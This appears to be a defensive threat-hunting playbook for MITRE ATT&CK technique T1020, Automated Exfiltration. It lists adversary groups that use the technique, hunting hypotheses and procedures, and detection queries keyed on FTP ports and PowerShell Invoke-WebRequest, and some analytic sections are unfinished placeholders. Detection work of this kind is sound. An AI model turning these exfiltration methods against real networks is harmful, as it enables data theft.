# T1020 Automated Exfiltration

-----------------------------------------------------------------------

## Technique Description

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

## Technique Detection

Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.

-----------------------------------------------------------------------

### Tactics:

  *   Exfiltration

### Platforms:

  * Linux

  * macOS

  * Windows

  * Network

### Data Sources:

  * **Network Traffic:** Network Traffic Content

  * **Command:** Command Execution

  * **File:** File Access

  * **Script:** Script Execution

  * **Network Traffic:** Network Traffic Flow

  * **Network Traffic:** Network Connection Creation

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
| Sidewinder | [Sidewinder](https://attack.mitre.org/groups/G0121) has configured tools to automatically send collected files to attacker controlled servers.(Citation: ATT Sidewinder January 2021)| 
| Frankenstein | [Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which is automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)| 
| Tropic Trooper | [Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)	| 
| Honeybee | [Honeybee](https://attack.mitre.org/groups/G0072) performs data exfiltration is accomplished through the following command-line command: <code>from <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt</code>.(Citation: McAfee Honeybee)| 
| Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)| 
| Ke3chang | [Ke3chang](https://attack.mitre.org/groups/G0004) has performed  frequent and scheduled data exfiltration from compromised networks.(Citation: Microsoft NICKEL December 2021)| 
-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1020)

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is ran. Store permanent information in one of the relevant cells below*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated  Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- Actors may automate exfil using highly sophisticated implants or LOLbins and scripts. In unique contrast to operator directed exfil, automated exfil needs to hide and blend in very well, or utilize a novel C2 channel hidden from admins, users, or the system itself to guard against evasion. An implant with automated exfil is also likely intended to remain in network on medium to long term timeframes, as the adversary desires a constant stream of the latest intel from the target. This tactic will often involve a mail server, or outlook exploitation on the workstation.
- For these particular actors, automated exfil will be incorporated as a feature of highly sophisticated implants. These implants may choose to incorporate LOLBin's. In unique contrast to operator directed exfil, automated exfil needs to hide and blend in very well, or utilize a novel C2 channel hidden from admins, users, or the system itself to guard against evasion. An implant with automated exfil is also likely intended to remain in network on medium to long term timeframes, as the adversary desires a constant steam of the latest intel from the target. This tactic will often involve a mail server, or outlook exploitation on the workstation.

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

#### APT29	
- CosmicDuke exfiltrates collected files automatically over FTP to remote servers.

#### Gamaredon Group	
- has used modules that automatically upload gathered documents to the C2 server.

#### TURLA	
- LightNeuron can be configured to automatically exfiltrate files under a specified directory.

#### APT28	
- USBStealer automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.

## Detection Blindspots

- Undocumented or missed LOLBins.
- This is primarily a network technique and operators should understand that detection will most likely come from a network analyst.

## Analytical References

  * [LOLbas-windows (github)](https://lolbas-project.github.io/)
  * [GTFObins-nix (github)](https://gtfobins.github.io/)
  * [CosmicDuke Whitepaper (f-secure)](https://www.f-secure.com/documents/996508/1030745/cosmicduke_whitepaper.pdf)
  * [Gamaredon Group Grows Its Game 2020 (welivesecurity)](https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/)
  * [ESET-LightNeuron 2019 (welivesecurity)](https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf)
  * [Sednit Espionage Group Attacking Air Gapped Networks 2014 (welivesecurity)](http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/)
  * [Mitre ATT&CK T1020](https://attack.mitre.org/techniques/T1020/)
  * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md
  * https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.
- Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
- LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations.
- USBStealer is malware that has used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. Consequently, the analytic for USBStealer may exist instead with (T1092) or should be further developed in this analytic at a later time.
- For suspicious LOLBin's, utilize LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring. 
    - Are there any possibilities that can explain the activity as legitimate?
    - Is a "scoping" document available to give context for the devices in question? 
    - Are the "exfil" protocols used commonly seen across the network?
    - Can a lead or senior operator explain the activity as legitimate?
    - Can the MP explain the activity as legitimate?

Host Data Collection Procedure 1.1:

    1. Identify the common/present binaries on the network capable of exfiltration. (Known/observed LOLBins (page where a list of tools is kept with a first-observed date, name, common commandline constructions!!, perhaps hash and version, and a cloud of tags for it's capabilities to make it searchable)).
    2. Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.
    3. After receiving approval from Mission Commander, consider communication w/ MP on findings and establish a dialogue with what they recognize as normal and what they cannot explain or understand.

Analysis:

    1. Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
    2. For suspicious LOLBin's, utilize LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring. 
    3. Are there any possibilities that can explain the activity as legitimate?
    4. Is a "scoping" document available to give context for the devices in question? 
    5. Are the "exfil" protocols used commonly seen across the network?
    6. Can a lead or senior operator explain the activity as legitimate?
    7. Can the MP explain the activity as legitimate?

Host Data Collection Procedure 2.1:

    1. Identify the common/present binaries on the network capable of exfiltration. (Known/observed LOLBins (page where a list of tools is kept with a first-observed date, name, common commandline constructions!!, perhaps hash and version, and a cloud of tags for it's capabilities to make it searchable)).
    2. Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.

Analysis:

    1. Ensure communication w/ MP on findings, and establish a recorded dialogue detailing what they recognize as normal and what they cannot explain or understand.
    2. Utilize LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring. 

#### Analytic 1 (Turla, APT 28, APT 29)

  * **Information:** 'False Positive Rate : Medium'

  * **Information:** 'False positive rate is ultimately determined by system environment usage of FTP.'

  * **Source:** 'Windows Audits, Sysmon'

  * **Tool:** 'Kibana'

  * **Notes:** 

  * **Query:** ```event.code : 3 AND sourceport : 20 or 21```

#### Analytic 2 (Turla, APT 28, APT 29)
 
  * **Information:** 'False Positive Rate : Medium'

  * **Information:** 'Check message for Invoke-WebRequest or IWR. Moreover, understand that there may be more functions, custom or native, to perform the same action.'

  * **Source:** 'Windows Audits, Sysmon'

  * **Tool:** 'Kibana'

  * **Notes:** 

  * **Query:** ```event.code : 4104```



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

1. Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
2. For suspicious LOLBin's, utilize LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring. 
3. Are there any possibilities that can explain the activity as legitimate?
4. Is a "scoping" document available to give context for the devices in question? 
5. Are the "exfil" protocols used commonly seen across the network?
6. Can a lead or senior operator explain the activity as legitimate?
7. Can the MP explain the activity as legitimate?

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

#### Analytic 2

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

